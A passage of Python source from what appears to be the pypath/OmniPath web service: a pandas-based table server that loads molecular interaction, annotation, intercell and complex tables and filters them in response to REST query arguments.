TFcensus'),\n ('Locate', ('location', 'cls')),\n (\n 'Phosphatome',\n (\n 'family',\n 'subfamily',\n #'has_protein_substrates',\n )\n ),\n ('CancerSEA', 'state'),\n ('GO_Intercell', 'mainclass'),\n ('Adhesome', 'mainclass'),\n ('SignaLink3', 'pathway'),\n (\n 'HPA_secretome',\n (\n 'mainclass',\n #'secreted',\n )\n ),\n (\n 'OPM',\n (\n 'membrane',\n 'family',\n #'transmembrane',\n )\n ),\n ('KEGG', 'pathway'),\n #(\n #'CellPhoneDB',\n #(\n ## 'receptor',\n ## 'peripheral',\n ## 'secreted',\n ## 'transmembrane',\n ## 'receptor_class',\n ## 'secreted_class',\n #)\n #),\n ('kinase.com', ('group', 'family', 'subfamily')),\n ('Membranome', ('membrane',)),\n #('CSPA', 'in CSPA'),\n #('MSigDB', 'geneset'),\n #('Integrins', 'in Integrins'),\n ('HGNC', 'mainclass'),\n ('CPAD', ('pathway', 'effect_on_cancer', 'cancer', )),\n ('Signor', 'pathway'),\n ('Ramilowski2015', 'mainclass'),\n ('HPA_subcellular', 'location'),\n #('DisGeNet', 'disease'),\n ('Surfaceome', ('mainclass', 'subclasses')),\n ('IntOGen', 'role'),\n ('HPMR', ('role', 'mainclass', 'subclass', 'subsubclass')),\n #('CancerGeneCensus',\n #(\n ##'hallmark',\n ##'somatic',\n ##'germline',\n #'tumour_types_somatic',\n #'tumour_types_germline',\n #)\n #),\n #('DGIdb', 'category'),\n ('ComPPI', 'location'),\n ('Exocarta', 'vesicle'),\n ('Vesiclepedia', 'vesicle'),\n ('Ramilowski_location', 'location'),\n ('LRdb', ('role', 'cell_type')),\n }\n\n def __init__(\n self,\n input_files = None,\n only_tables = None,\n exclude_tables = None,\n ):\n \"\"\"\n Server based on ``pandas`` data frames.\n\n :param dict input_files:\n Paths to tables exported by the ``pypath.websrvtab`` module.\n \"\"\"\n\n session_mod.Logger.__init__(self, name = 'server')\n\n self._log('TableServer starting up.')\n\n self.input_files = copy.deepcopy(self.default_input_files)\n self.input_files.update(input_files or {})\n self.data = {}\n\n self.to_load = (\n self.data_query_types - 
common.to_set(exclude_tables)\n if only_tables is None else\n common.to_set(only_tables)\n )\n\n self._log('Datasets to load: %s.' % (', '.join(sorted(self.to_load))))\n\n self._read_tables()\n\n self._preprocess_interactions()\n self._preprocess_enzsub()\n self._preprocess_annotations()\n self._preprocess_complexes()\n self._preprocess_intercell()\n self._update_resources()\n\n BaseServer.__init__(self)\n self._log('TableServer startup ready.')\n\n\n def _read_tables(self):\n\n self._log('Loading data tables.')\n\n for name, fname in iteritems(self.input_files):\n\n if name not in self.to_load:\n\n continue\n\n fname_gz = f'{fname}.gz'\n fname = fname_gz if os.path.exists(fname_gz) else fname\n\n self._log('Loading dataset `%s` from file `%s`.' % (name, fname))\n\n if not os.path.exists(fname):\n\n self._log(\n 'Missing table: `%s`.' % fname\n )\n continue\n\n dtype = self.default_dtypes[name]\n\n self.data[name] = pd.read_csv(\n fname,\n sep = '\\t',\n index_col = False,\n dtype = dtype,\n )\n\n self._log(\n 'Table `%s` loaded from file `%s`.' % (name, fname)\n )\n\n\n def _network(self, req):\n\n hdr = ['nodes', 'edges', 'is_directed', 'sources']\n # `tbl` is the data frame itself; the stray `.field` attribute access\n # that used to be here would have broken the zip below\n tbl = self.data['network']\n val = dict(zip(tbl.field, tbl.value))\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n return json.dumps(val)\n else:\n return '%s\\n%s' % ('\\t'.join(hdr), '\\t'.join(\n [str(val[h]) for h in hdr]))\n\n\n def _preprocess_interactions(self):\n\n if 'interactions' not in self.data:\n\n return\n\n self._log('Preprocessing interactions.')\n tbl = self.data['interactions']\n tbl['set_sources'] = pd.Series(\n [set(s.split(';')) for s in tbl.sources]\n )\n tbl['set_dorothea_level'] = pd.Series(\n [\n set(s.split(';'))\n if not pd.isnull(s) else\n set([])\n for s in tbl.dorothea_level\n ]\n )\n\n\n def _preprocess_enzsub(self):\n\n if 'enzsub' not in self.data:\n\n return\n\n self._log('Preprocessing enzyme-substrate relationships.')\n tbl = self.data['enzsub']\n tbl['set_sources'] = pd.Series(\n [set(s.split(';')) for s in tbl.sources]\n )\n\n\n def _preprocess_complexes(self):\n\n if 'complexes' not in self.data:\n\n return\n\n self._log('Preprocessing complexes.')\n tbl = self.data['complexes']\n\n tbl = tbl[~tbl.components.isna()]\n\n with ignore_pandas_copywarn():\n\n tbl['set_sources'] = [set(s.split(';')) for s in tbl.sources]\n tbl['set_proteins'] = [set(c.split('_')) for c in tbl.components]\n\n self.data['complexes'] = tbl\n\n\n def _preprocess_annotations_old(self):\n\n if 'annotations' not in self.data:\n\n return\n\n renum = re.compile(r'[-\\d\\.]+')\n\n\n def _agg_values(vals):\n\n result = (\n '#'.join(sorted(set(str(ii) for ii in vals)))\n if not all(\n isinstance(i, (int, float)) or (\n isinstance(i, str) and\n i and (\n i is None or\n renum.match(i)\n )\n )\n for i in vals\n ) else\n ''\n )\n\n return result\n\n\n self._log('Preprocessing annotations.')\n\n self.data['annotations_summary'] = self.data['annotations'].groupby(\n ['source', 'label'],\n ).agg({'value': _agg_values}).reset_index(drop = False)\n\n\n def _preprocess_annotations(self):\n\n if 'annotations' not in self.data:\n\n return\n\n renum = re.compile(r'[-\\d\\.]+')\n\n\n self._log('Preprocessing annotations.')\n\n values_by_key = collections.defaultdict(set)\n\n # we need to do it this way as we are memory limited on the server\n # and pandas groupby is very memory intensive\n for row in self.data['annotations'].itertuples():\n\n value = (\n ''\n if (\n (\n not isinstance(row.value, bool) and\n 
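The 'category' and narrow integer dtypes in default_dtypes are what make these tables affordable in memory once _read_tables hands them to pandas. A minimal sketch of the effect; the file name and columns here are illustrative:

import pandas as pd

dtype = {'source': 'category', 'target': 'category', 'is_directed': 'int8'}
tbl = pd.read_csv('interactions.tsv', sep='\t', index_col=False, dtype=dtype)

# with 'category', each repeated string is stored once plus small integer
# codes; compare against a plain object-dtype load of the same file:
print(tbl.memory_usage(deep=True).sum())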
isinstance(row.value, (int, float))\n ) or\n renum.match(row.value)\n ) else\n str(row.value)\n )\n\n values_by_key[(row.source, row.label)].add(value)\n\n for vals in values_by_key.values():\n\n if len(vals) > 1:\n\n vals.discard('')\n\n vals.discard('')\n vals.discard('nan')\n\n self.data['annotations_summary'] = pd.DataFrame(\n list(\n (source, label, '#'.join(sorted(values)))\n for (source, label), values in iteritems(values_by_key)\n ),\n columns = ['source', 'label', 'value'],\n )\n\n\n def _preprocess_intercell(self):\n\n if 'intercell' not in self.data:\n\n return\n\n self._log('Preprocessing intercell data.')\n tbl = self.data['intercell']\n tbl.drop('full_name', axis = 1, inplace = True, errors = 'ignore')\n self.data['intercell_summary'] = tbl.filter(\n ['category', 'parent', 'database'],\n ).drop_duplicates()\n\n\n def _update_resources(self):\n\n self._log('Updating resource information.')\n\n self._resources_dict = collections.defaultdict(dict)\n\n res_ctrl = resources_mod.get_controller()\n\n for query_type in self.data_query_types:\n\n if query_type not in self.data:\n\n continue\n\n tbl = self.data[query_type]\n\n # finding out what is the name of the column with the resources\n # as this is different across the tables\n for colname, argname in (\n ('database', 'databases'),\n ('sources', 'databases'),\n ('source', 'databases'),\n ('category', 'categories')\n ):\n\n if colname in tbl.columns:\n\n break\n\n # collecting all resource names\n values = sorted(set(\n itertools.chain(*(\n val.split(';') for val in getattr(tbl, colname)\n ))\n ))\n\n for db in values:\n\n if 'license' not in self._resources_dict[db]:\n\n license = res_ctrl.license(db)\n\n if license is None:\n\n msg = 'No license for resource `%s`.' % str(db)\n self._log(msg)\n raise RuntimeError(msg)\n\n license_data = license.features\n license_data['name'] = license.name\n license_data['full_name'] = license.full_name\n self._resources_dict[db]['license'] = license_data\n\n if 'queries' not in self._resources_dict[db]:\n\n self._resources_dict[db]['queries'] = {}\n\n if query_type not in self._resources_dict[db]['queries']:\n\n if query_type == 'interactions':\n\n datasets = set()\n\n for dataset in self.datasets_:\n\n if dataset not in tbl.columns:\n\n continue\n\n for in_dataset, resources in zip(\n getattr(tbl, dataset),\n tbl.set_sources,\n ):\n\n if in_dataset and db in resources:\n\n datasets.add(dataset)\n break\n\n self._resources_dict[db]['queries'][query_type] = {\n 'datasets': sorted(datasets),\n }\n\n elif query_type == 'intercell':\n\n tbl_db = tbl[\n (tbl.database == db) &\n (tbl.scope == 'generic')\n ]\n\n self._resources_dict[db]['queries'][query_type] = {\n 'generic_categories': sorted(\n set(tbl_db.category)\n ),\n }\n\n else:\n\n self._resources_dict[db]['queries'][query_type] = {}\n\n self.args_reference[query_type][argname] = values\n\n self._resources_dict = dict(self._resources_dict)\n\n self._log('Finished updating resource information.')\n\n\n def _check_args(self, req):\n\n result = []\n argname = req.postpath[0]\n ref = (\n self.args_reference['resources']\n if argname == 'databases' else\n self.args_reference[argname]\n )\n\n for arg, val in iteritems(req.args):\n\n arg = arg.decode('utf-8')\n\n if arg in ref:\n\n if not ref[arg] or not val:\n\n continue\n\n val = (\n {val[0]}\n if type(val[0]) is int else\n set(val[0].decode('utf-8').split(','))\n )\n\n unknowns = val - set(ref[arg])\n\n if unknowns:\n\n result.append(\n ' ==> Unknown values for argument `%s`: `%s`' % (\n arg,\n ', 
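The memory remark above can be made concrete. A toy comparison of the two summarisation strategies; the column names follow the annotations table:

import collections
import pandas as pd

df = pd.DataFrame({
    'source': ['A', 'A', 'B'],
    'label':  ['x', 'x', 'y'],
    'value':  ['1', '2', 'z'],
})

# groupby materialises per-group objects before aggregating:
summary = df.groupby(['source', 'label'])['value'].agg(
    lambda v: '#'.join(sorted(set(v)))
).reset_index()

# the streaming variant keeps only one small dict of sets alive:
values_by_key = collections.defaultdict(set)
for row in df.itertuples():
    values_by_key[(row.source, row.label)].add(str(row.value))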
'.join(str(u) for u in unknowns)\n )\n )\n\n else:\n\n result.append(' ==> Unknown argument: `%s`' % arg)\n\n req.args[b'header'] = self._parse_arg(req.args[b'header'])\n\n if result:\n\n return (\n 'Something is not entirely good:\\n%s\\n\\n'\n 'Please check the examples at\\n'\n 'https://github.com/saezlab/pypath\\n'\n 'and\\n'\n 'https://github.com/saezlab/DoRothEA\\n'\n 'If you still experiencing issues contact us at\\n'\n 'https://github.com/saezlab/pypath/issues'\n '' % '\\n'.join(result)\n )\n\n\n def queries(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n query_type = self._query_type(query_type)\n\n query_param = (\n req.postpath[2]\n if len(req.postpath) > 2 else\n None\n )\n\n if query_type in self.args_reference:\n\n result = dict(\n (\n k,\n sorted(v) if isinstance(v, common.list_like) else v\n )\n for k, v in self.args_reference[query_type].items()\n )\n\n if query_param is not None and query_param in result:\n\n result = {query_param: result[query_param]}\n\n else:\n\n result = {}\n result[query_type] = (\n 'No possible arguments defined for'\n 'query `%s` or no such query available.' % query_type\n )\n\n result = self._dict_set_to_list(result)\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return 'argument\\tvalues\\n%s' % '\\n'.join(\n '%s\\t%s' % (\n k,\n ';'.join(v)\n if isinstance(v, (list, set, tuple)) else\n str(v)\n )\n for k, v in iteritems(result)\n )\n\n\n @classmethod\n def _dict_set_to_list(cls, dct):\n\n return dict(\n (\n key,\n (\n sorted(val)\n if isinstance(val, common.list_like) else\n cls._dict_set_to_list(val)\n if isinstance(val, dict) else\n val\n )\n )\n for key, val in iteritems(dct)\n )\n\n\n def databases(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n query_type = self._query_type(query_type)\n\n datasets = (\n set(req.postpath[2].split(','))\n if len(req.postpath) > 2 else\n None\n )\n\n tbl = (\n self.data[query_type]\n if query_type in self.data else\n self.data['interactions']\n )\n\n # filter for datasets\n if query_type == 'interactions':\n\n if datasets is not None:\n\n tbl = tbl.loc[tbl.type.isin(datasets)]\n\n else:\n\n datasets = self._get_datasets()\n\n result = {}\n\n for dataset in datasets:\n\n result[dataset] = sorted(set.union(\n *tbl[tbl.type == dataset].set_sources)\n )\n\n else:\n\n result = {}\n result['*'] = sorted(set.union(*tbl.set_sources))\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return 'dataset\\tresources\\n%s' % '\\n'.join(\n '%s\\t%s' % (k, ';'.join(v)) for k, v in iteritems(result)\n )\n\n\n def _get_datasets(self):\n\n return list(self.data['interactions'].type.unique())\n\n\n def datasets(self, req):\n\n query_type = (\n req.postpath[1]\n if len(req.postpath) > 1 else\n 'interactions'\n )\n\n if query_type == 'interactions':\n\n result = self._get_datasets()\n\n else:\n\n result = []\n\n if b'format' in req.args and req.args[b'format'][0] == b'json':\n\n return json.dumps(result)\n\n else:\n\n return ';'.join(result)\n\n\n def interactions(\n self,\n req,\n datasets = {'omnipath'},\n databases = None,\n dorothea_levels = {'A', 'B'},\n organisms = {9606},\n source_target = 'OR',\n ):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n hdr = [\n 'source',\n 'target',\n 'is_directed',\n 'is_stimulation',\n 'is_inhibition',\n 'consensus_direction',\n 
'consensus_stimulation',\n 'consensus_inhibition',\n ]\n\n if b'source_target' in req.args:\n\n source_target = (\n req.args[b'source_target'][0].decode('utf-8').upper()\n )\n\n # changes the old, \"tfregulons\" names to new \"dorothea\"\n self._tfregulons_dorothea(req)\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n args = {}\n\n for arg in (\n 'datasets',\n 'types',\n 'sources',\n 'targets',\n 'partners',\n 'resources',\n 'organisms',\n 'dorothea_levels',\n 'dorothea_methods',\n ):\n\n args[arg] = self._args_set(req, arg)\n\n # here adjust on the defaults otherwise we serve empty\n # response by default\n if not args['types']:\n\n args['datasets'] = args['datasets'] or datasets\n\n # keep only valid dataset names\n args['datasets'] = args['datasets'] & self.datasets_\n\n args['organisms'] = set(\n int(t) for t in args['organisms'] if t.isdigit()\n )\n args['organisms'] = args['organisms'] or organisms\n\n # do not allow impossible values\n # those would result KeyError later\n args['dorothea_levels'] = (\n args['dorothea_levels'] or\n dorothea_levels\n )\n args['dorothea_methods'] = (\n args['dorothea_methods'] & self.dorothea_methods\n )\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(2, 'source_genesymbol')\n hdr.insert(3, 'target_genesymbol')\n else:\n genesymbols = False\n\n self._log('Processed arguments: [%s].' % common.dict_str(args))\n\n # starting from the entire dataset\n tbl = self.data['interactions']\n\n # filter by type\n if args['types']:\n\n tbl = tbl.loc[tbl.type.isin(args['types'])]\n\n # if partners provided those will overwrite\n # sources and targets\n args['sources'] = args['sources'] or args['partners']\n args['targets'] = args['targets'] or args['partners']\n\n # then we filter by source and target\n # which matched against both standard names\n # and gene symbols\n if args['sources'] and args['targets'] and source_target == 'OR':\n\n tbl = tbl.loc[\n tbl.target.isin(args['targets']) |\n tbl.target_genesymbol.isin(args['targets']) |\n tbl.source.isin(args['sources']) |\n tbl.source_genesymbol.isin(args['sources'])\n ]\n\n else:\n\n if args['sources']:\n tbl = tbl.loc[\n tbl.source.isin(args['sources']) |\n tbl.source_genesymbol.isin(args['sources'])\n ]\n\n if args['targets']:\n tbl = tbl.loc[\n tbl.target.isin(args['targets']) |\n tbl.target_genesymbol.isin(args['targets'])\n ]\n\n # filter by datasets\n if args['datasets']:\n\n tbl = tbl.query(' or '.join(args['datasets']))\n\n # filter by organism\n tbl = tbl.loc[\n tbl.ncbi_tax_id_source.isin(args['organisms']) |\n tbl.ncbi_tax_id_target.isin(args['organisms'])\n ]\n\n dorothea_included = (\n 'dorothea' in args['datasets'] or\n any(res.endswith('DoRothEA') for res in args['resources']) or\n (\n 'transcriptional' in args['types'] and\n not args['datasets']\n )\n )\n\n # filter by DoRothEA confidence levels\n if dorothea_included and args['dorothea_levels']:\n\n tbl = tbl.loc[\n self._dorothea_dataset_filter(tbl, args) |\n [\n bool(levels & args['dorothea_levels'])\n for levels in tbl.set_dorothea_level\n ]\n ]\n\n # filter by databases\n if args['resources']:\n\n tbl = tbl.loc[\n [\n bool(sources & args['resources'])\n for sources in tbl.set_sources\n ]\n ]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n if len(entity_types) == 1 and 'protein' in entity_types:\n\n # pandas is awful:\n 
tbl = tbl.loc[\n np.logical_and(\n tbl.entity_type_source.astype('string') == 'protein',\n tbl.entity_type_target.astype('string') == 'protein',\n )\n ]\n\n else:\n\n tbl = tbl.loc[\n tbl.entity_type_source.isin(entity_types) |\n tbl.entity_type_target.isin(entity_types)\n ]\n\n # filtering by DoRothEA methods\n if dorothea_included and args['dorothea_methods']:\n\n q = ['dorothea_%s' % m for m in args['dorothea_methods']]\n\n tbl = tbl.loc[\n self._dorothea_dataset_filter(tbl, args) |\n tbl[q].any(1)\n ]\n\n # filter directed & signed\n if (\n b'directed' not in req.args or\n self._parse_arg(req.args[b'directed'])\n ):\n\n tbl = tbl.loc[tbl.is_directed == 1]\n\n if (\n b'signed' in req.args and\n self._parse_arg(req.args[b'signed'])\n ):\n\n tbl = tbl.loc[np.logical_or(\n tbl.is_stimulation == 1,\n tbl.is_inhibition == 1\n )]\n\n # loops: remove by default\n if (\n b'loops' not in req.args or\n not self._parse_arg(req.args[b'loops'])\n ):\n\n # pandas is a disaster:\n tbl = tbl.loc[\n tbl.source.astype('string') !=\n tbl.target.astype('string')\n ]\n\n req.args[b'fields'] = req.args[b'fields'] or [b'']\n\n _fields = [\n f for f in\n req.args[b'fields'][0].decode('utf-8').split(',')\n if f in self.interaction_fields\n ]\n\n for f in (b'evidences', b'extra_attrs'):\n\n if f in req.uri and f not in req.args[b'fields'][0]:\n\n _fields.append(f.decode('utf-8'))\n\n for f in _fields:\n\n if f == 'ncbi_tax_id' or f == 'organism':\n\n hdr.append('ncbi_tax_id_source')\n hdr.append('ncbi_tax_id_target')\n\n elif f == 'entity_type':\n\n hdr.append('entity_type_source')\n hdr.append('entity_type_target')\n\n elif f in {'databases', 'resources'}:\n\n hdr.append('sources')\n\n elif f == 'datasets':\n\n hdr.extend(\n set(tbl.columns) &\n self.args_reference['interactions']['datasets'] &\n args['datasets']\n )\n\n else:\n\n hdr.append(f)\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_interactions(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n @classmethod\n def _dataset_included(cls, dataset: str, args: dict) -> bool:\n\n return (\n dataset in args['datasets'] or\n (\n not args['datasets'] and\n cls.dataset2type.get(dataset, None) in args['types']\n )\n )\n\n\n @classmethod\n def _dorothea_dataset_filter(cls, tbl: pd.DataFrame, args: dict):\n\n return (\n (\n # if the tf_target dataset is requested\n # we need to serve it including the parts which\n # don't fit the filters below\n cls._dataset_included('tf_target', args) &\n tbl.tf_target\n ) |\n (\n cls._dataset_included('collectri', args) &\n tbl.collectri\n )\n )\n\n\n def _tfregulons_dorothea(self, req):\n\n for arg in (b'datasets', b'fields'):\n\n if arg in req.args:\n\n req.args[arg] = [\n it.replace(b'tfregulons', b'dorothea')\n for it in req.args[arg]\n ]\n\n for postfix in (b'levels', b'methods'):\n\n key = b'tfregulons_%s' % postfix\n new_key = b'dorothea_%s' % postfix\n\n if key in req.args and new_key not in req.args:\n\n req.args[new_key] = req.args[key]\n _ = req.args.pop(key)\n\n\n def enzsub(\n self,\n req,\n organisms = {9606},\n enzyme_substrate = 'OR'\n ):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n hdr = [\n 'enzyme', 'substrate', 'residue_type',\n 'residue_offset', 'modification'\n ]\n\n if b'enzyme_substrate' in req.args:\n\n enzyme_substrate = (\n req.args[b'enzyme_substrate'][0].decode('utf-8').upper()\n )\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n args = {}\n\n for arg in (\n 'enzymes', 
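The astype('string') casts commented so bitterly above work around a real pandas restriction: two categorical columns can only be compared element-wise when their category sets match. A minimal reproduction:

import pandas as pd

a = pd.Series(['x', 'y'], dtype='category')
b = pd.Series(['x', 'z'], dtype='category')

# a == b  # raises TypeError: Categoricals can only be compared
#         # if 'categories' are the same
print(a.astype('string') == b.astype('string'))  # [True, False]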
'substrates', 'partners',\n 'resources', 'organisms', 'types',\n 'residues'\n ):\n\n args[arg] = self._args_set(req, arg)\n\n args['organisms'] = set(\n int(t) for t in args['organisms'] if t.isdigit()\n )\n args['organisms'] = args['organisms'] or organisms\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(2, 'enzyme_genesymbol')\n hdr.insert(3, 'substrate_genesymbol')\n else:\n genesymbols = False\n\n # starting from the entire dataset\n tbl = self.data['enzsub']\n\n # filter by type\n if args['types']:\n tbl = tbl.loc[tbl.modification.isin(args['types'])]\n\n # if partners provided those will overwrite\n # enzymes and substrates\n args['enzymes'] = args['enzymes'] or args['partners']\n args['substrates'] = args['substrates'] or args['partners']\n\n # then we filter by enzyme and substrate\n # which matched against both standard names\n # and gene symbols\n if (\n args['enzymes'] and\n args['substrates'] and\n enzyme_substrate == 'OR'\n ):\n\n tbl = tbl.loc[\n tbl.substrate.isin(args['substrates']) |\n tbl.substrate_genesymbol.isin(args['substrates']) |\n tbl.enzyme.isin(args['enzymes']) |\n tbl.enzyme_genesymbol.isin(args['enzymes'])\n ]\n\n else:\n\n if args['enzymes']:\n tbl = tbl.loc[\n tbl.enzyme.isin(args['enzymes']) |\n tbl.enzyme_genesymbol.isin(args['enzymes'])\n ]\n\n if args['substrates']:\n tbl = tbl.loc[\n tbl.substrate.isin(args['substrates']) |\n tbl.substrate_genesymbol.isin(args['substrates'])\n ]\n\n # filter by organism\n tbl = tbl.loc[tbl.ncbi_tax_id.isin(args['organisms'])]\n\n # filter by databases\n if args['resources']:\n\n tbl = tbl.loc[\n [\n bool(args['resources'] & sources)\n for sources in tbl.set_sources\n ]\n ]\n\n if req.args[b'fields']:\n\n _fields = [\n f for f in\n req.args[b'fields'][0].decode('utf-8').split(',')\n if f in self.enzsub_fields\n ]\n\n for f in _fields:\n\n if f == 'ncbi_tax_id' or f == 'organism':\n\n hdr.append('ncbi_tax_id')\n\n elif f in {'databases', 'resources'}:\n\n hdr.append('sources')\n\n else:\n\n hdr.append(f)\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_interactions(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def ptms(self, req):\n\n req.postpath[0] = 'enzsub'\n\n return self.enzsub(req)\n\n\n def enz_sub(self, req):\n\n req.postpath[0] = 'enzsub'\n\n return self.enzsub(req)\n\n\n def annotations(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n if (\n not settings.get('server_annotations_full_download') and\n not b'resources' in req.args and\n not b'proteins' in req.args\n ):\n\n return (\n 'Downloading the entire annotations database by the REST '\n 'API is not allowed because of its huge size (>1GB). '\n 'We recommend to query a set of proteins or a few '\n 'resources, depending on your interest. 
'\n 'You can always download the full database from '\n 'https://archive.omnipathdb.org/'\n 'omnipath_webservice_annotations__recent.tsv'\n )\n\n # starting from the entire dataset\n tbl = self.data['annotations']\n\n hdr = tbl.columns\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[tbl.source.isin(resources)]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n tbl = tbl.loc[tbl.entity_type.isin(entity_types)]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n tbl.uniprot.isin(proteins) |\n tbl.genesymbol.isin(proteins)\n ]\n\n # provide genesymbols: yes or no\n if (\n b'genesymbols' in req.args and\n self._parse_arg(req.args[b'genesymbols'])\n ):\n genesymbols = True\n hdr.insert(1, 'genesymbol')\n else:\n genesymbols = False\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_annotations(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def annotations_summary(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['annotations_summary']\n\n hdr = tbl.columns\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[tbl.source.isin(resources)]\n\n if (\n b'cytoscape' in req.args and\n self._parse_arg(req.args[b'cytoscape'])\n ):\n\n cytoscape = True\n\n else:\n\n cytoscape = False\n\n tbl = tbl.loc[:,hdr]\n\n if cytoscape:\n\n tbl = tbl.set_index(['source', 'label'], drop = False)\n\n cytoscape_keys = {\n (source, label)\n for source, labels in self.cytoscape_attributes\n for label in (\n labels if isinstance(labels, tuple) else (labels,)\n )\n } & set(tbl.index)\n\n tbl = tbl.loc[list(cytoscape_keys)]\n\n return self._serve_dataframe(tbl, req)\n\n\n def intercell(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n\n # starting from the entire dataset\n tbl = self.data['intercell']\n\n hdr = tbl.columns\n\n # filtering for category types\n for var in (\n 'aspect',\n 'source',\n 'scope',\n 'transmitter',\n 'receiver',\n 'parent',\n 'resources',\n ):\n\n if var.encode('ascii') in req.args:\n\n values = self._args_set(req, var)\n\n if var in {'resources', 'databases'}:\n\n var = 'database'\n\n tbl = tbl.loc[getattr(tbl, var).isin(values)]\n\n for (_long, short) in (\n ('transmitter', 'trans'),\n ('receiver', 'rec'),\n ('secreted', 'sec'),\n ('plasma_membrane_peripheral', 'pmp'),\n ('plasma_membrane_transmembrane', 'pmtm'),\n ):\n\n this_arg = None\n _long_b = _long.encode('ascii')\n short_b = short.encode('ascii')\n\n if _long_b in req.args:\n\n this_arg = self._parse_arg(req.args[_long_b])\n\n elif short_b in req.args:\n\n this_arg = self._parse_arg(req.args[short_b])\n\n if this_arg is not None:\n\n tbl = tbl.loc[getattr(tbl, _long) == this_arg]\n\n if b'causality' in req.args:\n\n causality = self._args_set(req, 'causality')\n\n trans = causality & {'transmitter', 'trans', 'both'}\n rec = causality & {'receiver', 'rec', 'both'}\n tbl = (\n tbl.loc[tbl.transmitter | tbl.receiver]\n if trans and rec else\n tbl.loc[tbl.transmitter]\n if trans else\n 
tbl.loc[tbl.receiver]\n if rec else\n tbl\n )\n\n if b'topology' in req.args:\n\n topology = self._args_set(req, 'topology')\n query = ' or '.join(\n colname\n for enabled, colname in\n (\n (topology & {'secreted', 'sec'}, 'secreted'),\n (\n topology & {'plasma_membrane_peripheral', 'pmp'},\n 'plasma_membrane_peripheral'\n ),\n (\n topology & {'plasma_membrane_transmembrane', 'pmtm'},\n 'plasma_membrane_transmembrane'\n )\n )\n if enabled\n )\n\n if query:\n\n tbl = tbl.query(query)\n\n # filtering for categories\n if b'categories' in req.args:\n\n categories = self._args_set(req, 'categories')\n\n tbl = tbl.loc[tbl.category.isin(categories)]\n\n # filtering for entity types\n if b'entity_types' in req.args:\n\n entity_types = self._args_set(req, 'entity_types')\n\n tbl = tbl.loc[tbl.entity_type.isin(entity_types)]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n np.logical_or(\n tbl.uniprot.isin(proteins),\n tbl.genesymbol.isin(proteins),\n )\n ]\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_intercell(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def intercell_summary(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['intercell_summary']\n\n hdr = tbl.columns\n\n # filtering for category types\n for var in (\n 'aspect',\n 'source',\n 'scope',\n 'transmitter',\n 'receiver',\n 'parent',\n 'resources',\n ):\n\n if var.encode('ascii') in req.args:\n\n values = self._args_set(req, var)\n\n tbl = tbl.loc[getattr(tbl, var).isin(values)]\n\n # filtering for categories\n if b'categories' in req.args:\n\n categories = self._args_set(req, 'categories')\n\n tbl = tbl.loc[tbl.category.isin(categories)]\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, req)\n\n\n def complexes(self, req):\n\n bad_req = self._check_args(req)\n\n if bad_req:\n\n return bad_req\n\n if b'databases' in req.args:\n\n req.args[b'resources'] = req.args[b'databases']\n\n # starting from the entire dataset\n tbl = self.data['complexes']\n\n hdr = list(tbl.columns)\n hdr.remove('set_sources')\n hdr.remove('set_proteins')\n\n # filtering for resources\n if b'resources' in req.args:\n\n resources = self._args_set(req, 'resources')\n\n tbl = tbl.loc[\n [\n bool(sources & resources)\n for sources in tbl.set_sources\n ]\n ]\n\n # filtering for proteins\n if b'proteins' in req.args:\n\n proteins = self._args_set(req, 'proteins')\n\n tbl = tbl.loc[\n [\n bool(this_proteins & proteins)\n for this_proteins in tbl.set_proteins\n ]\n ]\n\n license = self._get_license(req)\n\n tbl = self._filter_by_license_complexes(tbl, license)\n\n tbl = tbl.loc[:,hdr]\n\n return self._serve_dataframe(tbl, 